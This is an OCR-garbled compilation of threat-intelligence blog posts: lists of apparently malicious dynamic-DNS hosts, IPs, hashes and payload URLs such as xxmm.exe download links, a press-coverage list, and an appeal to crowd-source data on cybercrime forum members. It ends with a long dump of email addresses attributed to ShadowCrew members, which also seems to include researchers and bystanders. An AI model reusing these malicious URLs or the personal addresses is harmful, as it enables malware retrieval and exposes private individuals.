hxxp://weedforlifehacker.ddns.net/ 


hxxp://welcomeheretomept.ddns.net/ 


hxxp://williettinger.cc/ 
hxxp://win32.ddns.net/ 
hxxp://windows12345.ddns.net/ 
hxxp://windows/trojan.ddns.net/ 
hxxp://winserver.dlinkddns.com/ 
hxxp://woaisue.3322.org/ 
hxxp://wogusnb.no-ip.info/ 
hxxp://wombocombo.mooo.com/ 
hxxp://wtfwtf.duckdns.org/ 
hxxp://xalnewold.hopto.org/ 
hxxp://xilto.duckdns.org/ 
hxxp://xingyuekeji.f3322.net/ 
hxxp://xmppegy.com/ 
hxxp://Xnxx123.publicvm.com/ 
hxxp://xos1982.ddns.net/ 
hxxp://xtiger007.ddns.net/ 
hxxp://xzoro2016.no-ip.info/ 
hxxp://yangweb.f3322.net/ 


hxxp://yassinescaleo.ddns.net/ 
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hxxp://younix.ddns.net/ 
hxxp://yousefehab11.ddns.net/ 
hxxp://youseffathii.ddns.net/ 
hxxp://youssef-1234.hopto.org/ 
hxxp://yuosaf1993.ddns.net/ 
hxxp://yurimacedol.ddns.net/ 
hxxp://za3blawy.ddns.net/ 
hxxp://zaboza2020.ddns.net/ 
hxxp://zaheerkhan786.ddns.net/ 
hxxp://zakifr.no-ip.biz/ 
hxxp://zal75zk.ddns.net/ 
hxxp://zaliminxx.duckdns.org/ 
hxxp://zaqatala.dynu.com/ 
hxxp://zennone.ddns.net/ 
hxxp://zero228.ddns.net/ 
hxxp://zoheirdroidjack.zapto.org/ 
hxxp://zokor-zokor.ddns.net/ 
hxxp://zongkahani.no-ip.biz/ 
hxxp://zouhr9.hopto.org/ 
hxxp://zxczxczxc.ddns.net/ 
15.8.9 Historical OSINT - Profiling a Currently Circulating Malicious and Fraudulent 
Spam Campaign (2019-09-20 17:18) 
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15.8.10 Historical OSINT - Dancho Danchev’s Media and News Coverage - 2008-2013 
(2019-09-20 17:25) 
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Dear blog readers | wanted to take the time and effort and summarize all the currently related 
news media articles referencing me and my research throughout the period - 2008-2013 and 
wanted to express my gratitude to everyone who approached me seeking my assistance in an 
upcoming news article including those who participated in the search for me circa 2010 and | 
wanted to let everyone know that users interested in approaching me regarding potential news 
stories including conference presentations and possible threat intell requests can approach 
me at disruptive.individuals@gmail.com 


Stay tuned! 
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Research and News Articles covering my research and referencing me throughout - 2008: 


e [1]Russian hacker ‘militia’ mobilizes to attack Georgia 

¢ [2]Fraudsters Target Facebook With Phishing Scam 

¢ [3]Fake Microsoft e-mail contains Trojan virus 

¢ [4]Hackers expand massive IFRAME attack to prime sites 

¢ [5]Hackers infiltrate Google searches 

¢ [6]Hackers expand massive IFrame attack to prime sites 

¢ [7]Hackers knocked Comcast.net offline 

¢ [8]Adobe investigates Flash Player attacks 

¢ [9]High-tech bank robbers phone it in 

¢ [10]Attackers booby-trap searches at top Web sites 

¢ [11]Carpet bombing networks in cyberspace 

¢ [12]Storm worm e-mail says U.S. attacked Iran 

¢ [13]India’s underground CAPTCHA-breaking economy 

¢ [14]Domain Name Record Altered to Hack Comcast.net 

¢ [15]Google searchers could end up with a new type of bug 
¢ [16]Ongoing IFrame attack proving difficult to kill 

¢ [17]Hackers expand massive IFRAME attack to prime sites 
¢ [18]Danchev: The small pack Web malware exploitation kit 
¢ [19]Danchev: Massive SQL injection the Chinese way 

¢ [20]CAPTCHAs are dead - new research from Dancho Danchev confirms it 
e [21]Hackers infiltrate Google searches 

¢ [22]Massive faux-CNN spam blitz uses legit sites to deliver fake Flash 
¢ [23]Faked CNN spam blitz pushes fake Flash 

¢ [24]Danchev: Anti-fraud site DDOS attack 

¢ [25]Sony PlayStation site victim of SQL-injection attack 

¢ [26]Fake CNN Alert Still Soreading Malware 


¢ [27]Look Ma, I’m on CIA.gov 
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Research and News Articles covering my research and referencing me throughout - 2009: 


¢ [28]Green Dam exploit in the wild 

¢ [29]“In gaz we trust”: a fake Russian energy company facilitating cybercrime 
¢ [30]Don’t pay your ransom via SMS 

¢ [31L]NYT scareware scam linked to click fraud botnet 

¢ [32]Danchev: A crimeware developer’s to-do list 

¢ [33]Danchev rained on my scareware campaign 

¢ [34]ls “aggregate-and-forget” the future of cyber-extortion? 
¢ [35]NYT scareware scam linked to click fraud botnet 

¢ [36]Microsoft declares war on ’scareware’ 

¢ [37]Don’t pay your ransom via SMS 

¢ [38]Twitter warms up malware filter 

¢ [39]What’s really the safest Web Browser? 

¢ [40]With Unrest in Iran, Cyber-attacks Begin 


¢ [41]Zeus bot found using Amazon’s EC2 as C &C server 


Research and News Articles covering my research and referencing me throughout - 2010: 


¢ [42]Firefox add-on encrypts sessions with Facebook, Twitter 

¢ [43]Watch out for malware with those pretty Mac screensavers 
¢ [44]Months-old Skype vulnerability exploited in the wild 

¢ [45]Danchev: Money mule recruiters 

¢ [46]Cybercrime’s bulletproof hosting exposed 

¢ [47]Malware Threatens to Sue BitTorrent Downloaders 


¢ [48]Firefox add-on encrypts sessions with Facebook, Twitter 
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¢ [49]Chuck Norris Botnet Karate-chops Routers Hard 


Research and News Articles covering my research and referencing me throughout - 2011: 


¢ [50]Kaspersky disputes McAfee’s Shady Rat report 
¢ [51]Has EV-SSL Growth Been Slow? 
e [52]Report: Vishing Attack Targets Skype Users 


Research and News Articles covering my research and referencing me throughout - 2012: 


¢ [53]Fake UPS notices deliver malware 

¢ [54]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email 

¢ [55]New Skype malware threat reported: Poison Ivy 

¢ [56]Five Koobface botnet suspects named by New York Times 

¢ [57]Virtual jihad: How real is the threat? 

¢ [58]ls the death knell sounding for traditional antivirus? 

¢ [59]Can the Nuclear exploit kit dethrone Blackhole? 

¢ [60]Experts split over regulation for bounty-hunting bug sniffers 

¢ [61]Spammers Using Fake YouTube Notifications to Peddle Drugs 

¢ [62]Adele Bests Adderall As Affiliate Soammers Offer Music Downloads 


¢ [63]Bulgarian sleuth unveils botnet operators 
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¢ [64]Fake PayPal Emails Distributing Malware 

¢ [65]Web Gang Operating in the Open 

¢ [66]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email 
¢ [67]Buy 500 hacked Twitter accounts for less than a pint 

¢ [68]NBC.com Hacked, Infected With Citadel Trojan 


Research and News Articles covering my research and referencing me throughout - 2013: 


¢ [69]How Much Does A Botnet Cost? 

¢ [70]Automated YouTube account generator offered to cyber crooks 

¢ [71]Upgraded Modular Malware Platform Released in Black Market 

¢ [72]Deconstructing the Al-Qassam Cyber Fighters Assault on US Banks 

¢ [73]NBC hack infects visitors in ‘drive by’ cyberattack 

¢ [74]Bitcoins are being traded for hack tools 

¢ [75]New DIY Google Dorks Based Hacking Tool Released 

¢ [76]Hacking The TDoS Attack 

¢ [77]Mass website hacking tool alerts to dangers of Google dorks 

¢ [78]Cybercrime service automates creation of fake scanned IDs 

¢ [79]Spammers unleash DIY phone number slurping web tool 

¢ [80]Spam email contains malware, not Apple gift card 

¢ [81]APT1, that scary cyber-Cold War gang: Not even China’s best 

¢ [82]Mass website hacking tool alerts to dangers of Google dorks 

¢ [83]C &C PHP script for staging DDoS attacks sold on underground forums 
¢ [84]Russian Malware-as-a-Service Offers Up Server Rentals for $240 a Pop 
¢ [85]Java exploit kit sells for $40 per day 


¢ [86]Buggy DIY botnet tool leaks in black market 
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¢ [87]New DIY Google Dorks Based Hacking Tool Released 
¢ [88]Botnets for rent, criminal services sold in the underground market 


¢ [89]Spam email contains malware, not Apple gift card 
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79. https: //www.theregister.co.uk/2013/02/14/phone_harvesting_service_creates_spam_menace/ 


80. https: //www.scmagazineuk.com/article/1482050 


7077 


theregister.co.uk/2013/02/27/apt1_china_dark_visitor_b_team/ 
scmagazine.com/home/news/mass-website-hacking-tool-alerts-to-dangers-of-google-dorks/ 


helpnetsecurity .com/2013/09/10/cc-php-script-for-staging-ddos-attacks-sold-on-underground-fo 


infosecurity-magazine.com/news/russian-malware-as-a-service-offers-up-server/ 
v3.co.uk/v3-uk/news/2252440/java-exploit-kit-sells-for-usd40-per-da 


scmagazine.com/home/news/buggy-diy-botnet-tool-leaks-in-black-market/ 


securityweek.com/new-diy-google-dorks-based-hacking-tool-released 


cyberdef ensemagazine.com/botnets-for-rent-criminal-services-sold-in-the-underground-market/ 


crn.com.au/news/spam-email-contains-malware-not-apple-gift-card-353159 


15.8.11 Historical OSINT - Gmail’s CAPTCHA Under Fire (2019-09-20 17:31) 


http://www.castlecops.com/t192663-http 69 61 99 66 3 _php.html 


http://www.robtex.com/cnet/208.72.168.html 


http://www.secureworks.com/research/threats/ozdok/?threat=ozdok 


aaauaa.info - same netblock 


faq.890m.com 


208.72.168.140 8181 


http://threatexpert.com/reports.aspx?find=208.72.168.40 


208.72.168.40 on port 533 


http://threatexpert.com/reports.aspx?find=208.72.168 


208.72.168.40/404.txt 


208.72.168.40/cr.dat 


7078 


Result: 22/28 (78.58 %) Trojan.Proxy.Saturn.F 
File size: 36864 bytes 
MD5: 49e23bdba56e0a52578341181b4faf7b 


SHA1: 50fb2726declefb15723d93db8dcela60df676a5 


208.72.169.54 
208.72.169.55 
208.72.169.15 
208.72.168.52 
208.72.168.97 
208.72.169.15 
208.72.168.164 


208.72.168.76 


centerkras-tv.tv 
iloveeverybody.kz 
iloveeverybody.tj 
lansetcommunication.info 
lansetcommunication.biz 
lanset2007.com 
centerkras-tv.name 
centerkras-tv.info 


centerkras-tv. biz 


vaznyjdomen.info 
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http://vaznyjdomen.info/affcgi/online.fcgi?20199:0 
http://vaznyjdomen.info/gallery20199/xpsystem/rxs.ini.php 
http://lyalyabum.info/affcgi/online.fcgi?20199:0 
http://lyalyabum.info/gallery20199/xpsystem/rxs.ini.php 
http://lohotronschik.info/affcgi/online.fcgi?20199:0 
http://lohotronschik.info/gallery20199/xpsystem/rxs.ini.php 
http://lyalyabum.info/affcgi/try.fcgi? 20199 
http://vaznyjdomen.info/affiliate/interface3.php?userid=20199 
http://vaznyjdomen.info/affiliate/interface3.php?userid=20199 
http://vaznyjdomen.info/affcgi/online.fcgi?20199:1 
http://vaznyjdomen.info/xxmm.exe 
http://lyalyabum.info/affcgi/online.fcgi?20199:1 
http://lyalyabum.info/xxmm.exe 
http://lohotronschik.info/affcgi/online.fcgi?20199:1 


http://lohotronschik.info/xxmm.exe 


15.9 October 


15.9.1 Announcing Law Enforcement and OSINT Intelligence Operation "Uncle 
George" - Join Me Today! (2019-10-16 20:16) 
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Dear blog readers, 
Surprise, surprise! | wanted to let everyone know that I’ve spend a decent portion of 


my time crawling and actually harvesting and data mining 78 high-profile public Cybercrime 
Forum Communities basically consisting of 1M raw OSINT data Web site pages harvested and 
ready for processing and enrichment. Dare to join the campaign? Keep reading and drop me 
a line at ddanchev@cryptogroup.net to coordinate and discuss including details on how to 
obtain free access to the 2019 Cybercrime Forum Community Data Set which is basically 18GB 
comprising of 1M crawled and harvested Web sites from the most popular Public Cybercrime 
Forum Communities. 


Timeline of the Project including What You Need to Participate with the Ultimate Goal 
to Track Down the Individuals Behind These Communities and Actually Take Them Down: 


¢ Drop me a line at ddanchev@cryptogroup.net and let me know that you’ve downloaded 
it and that you’re currently interested in participating in the project 


¢ Please coordinate with me what you plan to do with the archive in terms of possible raw OS- 
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INT enrichment and automated Social Network Analysis including sharing it with your Law 
Enforcement contacts or colleagues in your organization at dancho.danchev@hush.com 


* Grab a copy of Open Desktop Semantic Search - https://www.opensemanticsearch.org and 
process the archive 


¢ Grab a copy of Solr-Powered Local Yacy Search Engine - https://yacy.net and process the 
archive 


* Grab a copy of Carrot2 - Open Source Search Results Clustering Engine - 
https://project.carrot2.org/ and connect it with Solr-Powered Local Yacy Search Engine and 
start processing the results and share the results with me at dancho.danchev@hush.com 


¢ Grab a copy of the following Statistical graphs generating tool - https://github.com/ko-ichi- 
h/khcoder and begin working on the archive 


The Objectives List: 


¢ Gather as much evidence for participation in fraudulent activity and shut down the com- 
munity 


* Collect as much personal information as possible including loCs (Indicators of Compro- 
mises) Web site URLs including personal IM accounts and personal email addresses 


Publicly publish the results of the crowd-sourced raw OSINT enrichment project campaign 
and ask everyone to reach out to their contacts in U.S Intelligence Community and interna- 
tional Law Enforcement to share the data and actively participate in the actual prosecution 
of the individuals behind these Cybercrime Forum Communities and the actual take-down 
process 


¢ Share the data-set with as many academic Security Industry U.S Intelligence and interna- 
tional Law Enforcement contacts as possible 


Drop me a line at ddanchev@cryptogroup.net and let’s get the campaign going! 


The results? Check out the following enriched raw OSINT graph which | managed to cre- 
ate for research purposes and to motivate you to participate. 
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Dimension 2 (0.171, 15.16%) 
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Dimension 1 (0.2364, 20.96%) 
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Related Graphs Produced To Motivate You to Participate on a Per Keyword Basis: 
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Sample Screenshot of the ShadowCrew Cybercrime Forum Community circa 2002-2004: 
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Sample Public Member Email addresses of ShadowCrew Cybercrime Forum Community circa 
2002-2004: 


shadow@shadowcrew.com 


idline@ziplip.com 
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vengeance 1@ziplip.com 
cracker81@ziplip.com 
den5013@ziplip.com 
onthefringe@ziplip.com 
midhack@ziplip.com 
toastypimp@yahoo.com 
fakeid@ziplip.com 
anonraider@hotmail.com 
KsnowyInc@ziplip.com 
spookycat911@ziplip.com 
Necromancer01@ziplip.com 
script4dumps@ukr.net 
dominican@ziplip.com 
rcwizard@ziplip.com 
CAYMAN@Vegas.zzn.com 
kahuna@mailvault.com 
nhlaxus@ziplip.com 
jamal@ziplip.com 
cam@mailvault.com 
stocksstocks@ziplip.com 
Dimmesdale@ziplip.com 
MiCRO tECh@ziplip.com 
vertiloto@blueyonder.co.uk 
ultrateckl146@aol.com 


ilithiumi@ziplip.com 
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flashfire@ziplip.com 
p4lman@s-mail.com 
vikkingchick@aol.com 

emo _faulds@hotmail.com 
drumnhoouse@netscape.net 
scottlenord@yahoo.com 
rkj22@ziplip.com 
tec9@mailvault.com 
subuk01@hotmail.com 
malpadre @hotmail.com 
kkmac2003@aol.com 
phoenixoz@hotmail.com 
natural ice 59@hotmail.com 
chrisp92656@yahoo.com 
agent@inbox.nu 
shadiestfiveten@hotmail.com 
matrix _447@yahoo.com 
hockeymark99@hotmail.com 
circatropolis@email.com 
circatrooper@hotmail.com 
damned@damned.ro 
Ranger@mailvault.com 
poop@sex.com 

crazy _gm@hotmail.com 


pimpin ken _op@hotmail.com 
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Slickrick@ziplip.com 
nons@usa.com 
wulfnacht@msn.com 
poofibgone@mailvault.com 
firewirelD@ziplip.com 
BIkOps@mailvault.com 
bikerbill@ziplip.com 
jwelsh@welshworks.com 
RichardKimble@mailvault.com 
yOrks@ziplip.com 
xdirc@mailvault.com 
jilsi@ziplip.com 
ji8si@hotmail.com 
JCDyer82@hotmail.com 
kill4kr@spray.se 
myleena@mailvault.com 
ccsupplier@ziplip.com 

bad _karma@ziplip.com 
cyptdog@homtail.com 
cyptdog@yahoo.com 
MrUntouchableSC@hotmail.com 
trance _boy3000@hotmail.com 
MrBill@emaildownunder.com 
icemanl2@mailvault.com 


thegeko2002@yahoo.fr 
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mcmf _violent j@hotmail.com 
djdonte@schoolsucks.com 
confidential@mutemail.com 
hiroshi _saito85@hotmail.com 
jorge28@hotmail.com 
jorgescalanter@yahoo.com 
mcscammer@ziplip.com 
esse@ziplip.com 
plasticbuyer@hotmail.com 
mad _carder@ziplip.com 
madcarder@aol.com 
dtraxor@hotmail.com 
clarolherbal@hotmail.com 
eddie 123@hotmail.com 
sales@perfectids.com 
digitaldemon@ziplip.com 
Pmal@ziplip.com 
sibba@ziplip.com 


slackerx@mailvault.com 


Chairmanoftheboard@ziplip.com 


BiglymeBallin@ziplip.com 
sharlton@hotmail.com 
willhemsley@hotmail.com 
rcwlzard@hotmail.com 


justlearning@hushmail.com 
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sexyred15@hotmail.com 

Mental _Hopscotch@hushmail.com 
e-talos@mailvault.com 
derezz404@hotmail.com 
nosoup4you@subdimension.com 
troymclure@ziplip.com 

ketamin _dream@hotmail.com 
telaviv2976us@yahoo.com 
verbalOg@yahoo.com 
verbalOg@msn.com 
saumurk@hotmail.com 
princeofpassionca@yahoo.ca 
gordie@ziplip.com 
djchepper@hotmail.com 
rudemuthafucka@imabadlittleboy.com 
unrealsecurity@mailvault.com 
glock911@mailvault.com 
geekusdeekus@hotmail.com 
tranceplastic@ziplip.com 
ozymandias@ziplip.com 
dutex@ziplip.com 
kamikavi@hotmail.com 
GLOBEMAN@ziplip.com 
bluetree1955@hotmail.com 


bluetree1955@yahoo.com 
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MiCRO tECh@yahoo.com 
frotchman@hotmail.com 
Raptor@mailvault.com 
homeboy@protectmymail.com 
jonny _boy89@hotmail.com 
masquerade71lid@hotmail.com 
masquerade71lid@yahoo.com 
space-dog@ntlworld.com 
NeilPeart@ziplip.com 
deraw280@mailvault.com 
chingiz@gmx.net 
axecharlton@breathe.com 
nolbetta@ziplip.com 
petegr@ziplip.com 

Chemical Kidd@hotmail.com 
trustfunded@hotmail.com 
boomsicka@ziplip.com 
c12173@hotmail.com 

Top _Holos@yahoo.com 
phraud@ziplip.com 

counter _fit@ziplip.com 
PygmyShrew@ziplip.com 
gettowitch@ziplip.com 
khamkham@ziplip.com 


rogue _enc@hushmail.com 
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ink@themusclezine.com 
IPgOsht@hotmail.com 
Thakid22@yahoo.com 
snowboardkid56@aol.com 
milkee2936@ziplip.com 
keithl569@mailvault.com 
gucciman _2003@yahoo.com 
gucciman _2003@hotmail.com 
LrdPath@aol.com 
jesevski@hotmail.com 

alex _phukoff@hotmail.com 
aftermathl1024@msn.com 
blaze1669@yahoo.com 
mister shaggy@hotmail.com 
tandrek@mailvault.com 
lawhack@ziplip.com 
bluebamboo49@yahoo.com 
whynot _@ziplip.com 
orders@terroristsupply.com 
scrub22003@yahoo.com.br 
minus9@mailvault.com 
thecreame@hotmail.com 
jhosking77@yahoo.com.au 
usaru2001@yahoo.com 


blackice8636@ziplip.com 
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omarhayyam2002@yahoo.com 
namon@mailvault.com 
DM6311@ziplip.com 

board dokter2000@hotmail.com 
shaubarak@ziplip.com 
MR.HR@ziplip.com 
theamericanpsycho@ziplip.com 
ehlerssc@msu.edu 
meerakker@s-mail.com 
blackrob911@hotmail.com 
blackrob91@aol.com 
humpmike420@hotmail.com 
romainschwertz@pingnet.ch 
nightkrawler@ziplip.com 
drudown@ziplip.com 
veg@ziplip.com 
degreeuniversity@ziplip.com 
spunlinspunville@yahoo.com 
chewis393@hotmail.com 
chewis393@yahoo.com.mx 
dstephania@attbi.com 
locolive@ziplip.com 
og6@ziplip.com 
yeez@hotmail.com 


EvenOner@hotmail.com 
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tonsoffun@ziplip.com 
grupopax@yahoo.com 
medellru@yahoo.com 
atownave@hotmail.com 
brynster1@ziplip.com 
freddiez@hotmail.com 
mathieu690@gosympatico.ca 
sales@cooldegree.com 
Slaurworks@earthdome.com 
majjack@majjack.com 

dan _lopez99@hotmail.com 
SCjamalSC@yahoo.com 
koolhandluke@ziplip.com 
donnyisnaked@msn.com 
blackarmor@ziplip.com 

joe _quarterback@hotmail.com 
al _cappone22@hotmail.com 
i_luv _u_ro@yahoo.com 

No _Exit@hotmail.com 
back2daprimitive@hotmail.com 
freshintake@msn.com 
dival@ziplip.com 
Feces@Poop.org 
visualise303@hotmail.com 


benstone@mailvault.com 
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darktide@telusplanet.net 
tonystarx@ziplip.com 
ctroy@ziplip.com 
FraMd323@mailvault.com 
a_nightmare@mailvault.com 
spitphire@mail.ru 
jwillpromo@yahoo.com 
doggfortyfive@hotmail.com 
marthamoxley@mail.ru 
skulebas101@hotmail.com 
neuby34@hotmail.com 
bigpickster@aol.com 
caligirl02@ziplip.com 
OOnytejadeOO@aol.com 
wolfram@ziplip.com 
bigbuyer@counterfeitcards.com 
hoots1967@hotmail.com 
Ace@Hole.com 
thessor@ziplip.com 
adamtoth@hotmail.com 
dieselino@usa.com 
wakes@ziplip.com 
crazyd9483@hotmail.com 
triple-sinner@ziplip.com 


midnyte@stormfeather.com 
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tron@counterfeitcards.com 
job604@hotmail.com 
Ali3nS3xFi3nd@msn.com 
emperordalek@zombieworld.com 
Southerner@Republican.com 
johnkimble@mailvault.com 
dr.p@ziplip.com 

deen suleman@yahoo.com 
mycounter@ziplip.com 
tellatubbiesrko@aol.com 
los.angeless@fbl.gov 
freeman82@ziplip.com 
ukbadboy@ziplip.com 
flossboi@yahoo.com 
modestlygreat@hotmail.com 
modestlygreat@yahoo.com 
abaddon@802.11ninja.net 
frostedflake@yahoo.com 
badnewstodd@ziplip.com 
cromm@dquicksilver.net.nz 
badboyballads2000@yahoo.com 
xstreetsk8er487x@yahoo.com 
ccking@electricpenis.com 
gtelia@hotmail.com 


gtelia00@yahoo.com 
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sif@ziplip.com 
musha@phreaker.net 
thecatreturn@hotmail.com 
neiromantik@yahoo.com 
Byrd@flashmail.com 
ilalexil@hotmail.com 
shabazz@ziplip.com 
sp00f@ziplip.com 
platinumplus@ziplip.com 
5u5p3ct@cyber-rights.net 
polikking@mailvault.com 
willieo@ziplip.com 
waynewayne@ziplip.com 
ranxerox69@bolt.com 
linkpin34@aol.com 
OerO@mailvault.com 
jasonbourne@ziplip.com 
xminderbinderx@ziplip.com 
combattantdeliberte@ziplip.com 
nonzero@hush.com 
CANADIAN2001@ziplip.com 
shellydvained@yahoo.com 
jon@fakeiduk.co.uk 
PaulieStew@hotmail.com 


jeremyzamyslowski711@hotmail.com 
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oofzpumba@yahoo.com 
oofzoumba@msn.com 
crackolic@hotmail.com 
carding@versa-us.com 

b _digital2k@hotmail.com 
alyn peden@hotmail.com 
DebbieGroeneveld192@hotmail.com 
kyndo@ziplip.com 
midhack@mailvault.com 
robertlowery 1@lycos.com 
jeffsm@ziplip.com 
swastikaeyes@ziplip.com 
Email@shadowcrew.com 
RyDen@ziplip.com 
thanxlinkpin34@aol.com 
slobodan2002@mail.ru 
plastic@counterfeitcards.com 
down@ftp.ttdown.com 
KyrON@zor.org 
ttdown@ftp3.ttdown.com 
fix@jsftp.fixdown.net 
perfectids@mailvault.com 
BrianD@mailvault.com 
whatever@ziplip.com 


login@ziplip.com 
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registry@forss.net 
martin.andersson@utfors.se 
krister.lenberg@utfors.se 
buyerguide@accountant.com 
intellegence@ziplip.com 
script4cc@ukr.net 
z-e-N@mailvault.com 
irisport@ziplip.com 
doink2@ziplip.com 
harro@ziplip.com 
plunger@mailvault.com 
CardGuy _1983@ziplip.com 
tazorak@yifan.net 
nouvou@ziplip.com 
mrsyndicate@mailvault.com 
wileecoyote@ziplip.com 
yes@ilovelily.net 
qwert@ua.fm 
jdp@usermail.com 
bulkbuyer@usa.com 
osharifff@yahoo.fr 
fonefag@ziplip.com 
asheroner@ziplip.com 
eagle@eagle.org 


BadnewsBrown667@aol.com 
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thanksalotman@hotmail.com 
thalus _private@mailvault.com 
skaplan110@attbi.com 
shadowcrew@ziplip.com 
domain@zentek-international.com 
ni69az@yahoo.com 
thelistguy@ziplip.com 

ICE Storm@ziplip.com 
macgyver@mailvault.com 
61476@xxxx.edu 
rocketchimpalpha@hotmail.com 
wolfram@consultant.com 
daidarek@hotmail.com 
admin@mypage.4all.cc 
leek@europe.com 
morzhov@bk.ru 

Blah@aol.com 
stayfly2udie@hotmail.com 
info@e-fidex.com 
krankmeup@mailvault.com 
blankcheck@hushmail.com 
s3ba@ziplip.com 
ifyourinthebattle@ziplip.com 
kathy@fakeidman.org 


art@martinridley.com 
7120 


khameleon@ziplip.com 
stallionmover@scurtek.com 
Excise@ziplip.com 

bones 49 5@hotmail.com 
leek@mail.com 
saint7@Cyber-rights.net 
kagney@ziplip.com 
XBand2040@mailvault.com 
TheBestofBC@ziplip.com 
caponeseller@mail.com 
smartcarder@yahoo.com 
knowledgeableone@hotmail.com 
knowledgeableone@quixer.com 
knowledgeable1@quixer.com 
poppy.crops@ziplip.com 
cc4me@hotmail.com 
deriva@ziplip.com 
scarfaceO5@ziplip.com 
blackdog53@ziplip.com 
24609@ziplip.com 
midhack@verizon.net 
Deck@ziplip.com 
vitali@webmoney.ee 
silentmaori@hotmail.com 


thetussin@ziplip.com 
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refy@ziplip.com 
Troublesome714@ziplip.com 
la-al@justice.gc.ca 
blueman77@ziplip.com 
knobs@oceanfree.net 
jburton@ziplip.com 
whatever@ebay.com 
miragegq@yahoo.com 
exids@ziplip.com 
defx@ziplip.com 
URsTrULyInNNYC@aol.com 
shiva@computekservices.com 
Paulsmithinny@yahoo.com 
cjlax5@ziplip.com 
user@pm-shadowcrew.com 
meerakker@pm-shadowcrew.com 
kickman@ziplip.com 
thesoupnazi@ziplip.com 
importuner@ziplip.com 
vlpee@e-mail.ru 
patryn@ziplip.com 
aladdin275@yahoo.com 
capaefex@ziplip.com 
walterwolf@ziplip.com 


SLiPZ@ziplip.com 
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iisps@ziplip.com 
alexei_d@mail.ru 
sharon@captix.com 
magog@ziplip.com 


jayare@ziplip.com 


webappsec@securityfocus.com 


novidus@ziplip.com 
ttboafact@canada.com 
Ziffnavi@fitec.co.jp 
perfectionist2003@ziplip.com 
bigbuyer@gmx.net 
mrnoface@ziplip.com 
info@photoidcards.com 
kidd@ziplip.com 
ben@getwasted.net 

CT _man@ziplip.com 
idcrisis@ziplip.com 
soccccerguy@hotmail.com 
shadowdonations@ziplip.com 
you@shadowcrew.com 
mobties@ziplip.com 
calitaliban@ziplip.com 
admin.buu@loxinfo.ac.th 
route@infonexus.com 


momomania@hotmail.com 
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Namechange@ziplip.com 
salve2001@ziplip.com 
Gateway2000@ziplip.com 
Slayer@Kraix.com 
great.cc4me@hotmail.com 
cc@scriptsjob.com 
shadowmembership@ziplip.com 
Sigma@DNS-CORE.com 
admin@shadowcrew.com 
tom333@ziplip.com 
sadf@1Cust31.tnt1.minneapolis.mn.da.uu.net 
mrmojorising@ziplip.com 
securitymind@tut.by 
teslinsupply@yahoo.com 
restoration656@hotmail.com 
hara@ypn.co.uk 
1Q163@ziplip.com 
lex@mindvox.phantom.com 
lex@stormking.com 
jzamyslowski711@hotmail.com 
Thedude@aol.com 
cl@counterfeitlibrary.com 
kestra@ziplip.com 
capone420@ziplip.com 


hpouches@yahoo.com 
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gollumfun@ziplip.com 
degreeuniversity@hotmail.com 
akingston@ziplip.com 
customitnow@ziplip.com 
Eloheem@ziplip.com 
blacks@mail.com 
joe@innerhost.com 
Canuck@ziplip.com 
canuck@amadeupemailaddressidonthaveaccessto.com 
spit-fire@ziplip.com 
sales@closedcollege.com 
billing@Phantominfo.com 
cham@ua.fm 
Fontaine420@ziplip.com 
CreepO1@ziplip.com 
dammit@ziplip.com 
gollumfun@hushmail.com 
domains@aol.net 
abuse@aol.net 

noc@aol.net 
kaliberx@ziplip.com 
info@professionaldegrees.com 
info@penningtonu.com 
kingofthefoothill@hotmail.com 


pridget@dbzmail.com 
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interception@mail.com 
080120@ziplip.com 
werewolf@gmx.net 
fgmp123@ziplip.com 
Cyphon@ziplip.com 
cplanet@ziplip.com 
legal@shadowcrew.com 
stuffx@ziplip.com 
nobody@sigma.dns-core.com 
E17sb1x-0000F6-00@sigma.dns-core.com 
team@verizon.net 
dogwood70@ziplip.com 
team@adultfriendfinder.com 
username@NOSPAM.domain.com 
tdog@myself.com 
ralph@doncaster.on.ca 
realplastic@gmx.net 
you@hush.com 
you@elitefitness.com 
DR.Smith@belizeweb.com 
lighthawk4@ziplip.com 
ampersona@ziplip.com 
lancelotlink@ziplip.com 
mhall@netcom.com 


pvthc@ziplip.com 
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chbigben@ziplip.com 
drift@ziplip.com 

mac _addict1984@yahoo.com 
littletommy@ziplip.com 
FireWire@ziplip.com 
firewire7@hotmail.com 
renegadeUK@ziplip.com 
zidaneiv@hotmail.com 
wldnczy@ziplip.com 
fakelDusa@ziplip.com 
thelandonly@ziplip.com 

GiB _Uk@ziplip.com 
jon101@ziplip.com 
helpwanted@ziplip.com 
email. lll barcode _II|@ziplip.com 
TZ2@ziplip.com 
madrid@ziplip.com 
Artyanon@mailvault.com 
utax@inbox.lv 
saradonne@ziplip.com 
perfectids@yahoo.com 
blackarmor@eurosport.com 
kkimmel@terroristsupply.com 
idline@mailvault.com 


dr@dursec.com 
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rongula31@hotmail.com 
ken.williams@ey.com 
roesch@sourcefire.com 
fygrave@scorpions.net 
vision@whitehats.com 
rfp@wiretrip.net 
alephl@securityfocus.com 
wooc@powersurfr.com 
apr.inc@powersurfr.com 
conroy.badger@powersurfr.com 
crystal@positioning-research.com 
jason.dorie@blackboxgames.com 
darryl _turner@yahoo.com 
mrandles@softhome.net 
vizuelle@eudoramail.com 
fyodor@insecure.org 
spikeman@spikeman.net 
lance@spitzner.net 
listuser@seifried.org 
mfranz@cisco.com 
phillip.ibis@blackboxgames.com 
cwallace@exceedia.com 
priest@sfu.ca 
hdm@digitaloffense.net 


rhamel@kpmg.ca 
7128 


nico@securite.org 
kaneda@securite.org 
dsward9s@pacbell.net 
andy@dragonfly.demon.co.uk 
ktwo@ktwo.ca 
kinkster1@shaw.ca 
ajarman@metacomcorp.com 
zindelak@telusplanet.net 
jeff@wwti.com 
smkoen@hotmail.com 
cwilson2@kpmg.ca 
newspixie@hotmail.com 
mock@obscurity.org 
j@lords.com 
ksoze@obscurity.org 
frank@atstake.com 
fishy@powersurfr.com 
cakeislove@hotmail.com 
tiffany kary@zd.com 
stephenn@powersurfr.com 
webmaster@pneumafables.com 
bsapiro@kpmg.ca 
kmx@egatobas.org 
hectorh@pobox.com 


emmanuel@relaygroup.com 
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vanja@vanja.com 
dje@bht.com 
dugsong@monkey.org 
lyndon@orthanc.ab.ca 
mts@off.off.to 
paudley@blackcat.ca 

robert david graham@yahoo.com 
spambait-kyx@inetgrity.com 
chris@obscurity.org 

peter _wong@pmc-sierra.com 
janet@lomas.ab.ca 
dfreelove@yottayotta.com 
dowen@intravelnet.com 
randlest@oanet.com 
jay@bastille-linux.org 
phil@ccc-ltd.com 
jed@pickel.net 
gshipley@neohapsis.com 
deraison@cvs.nessus.org 
maxx@securite.org 
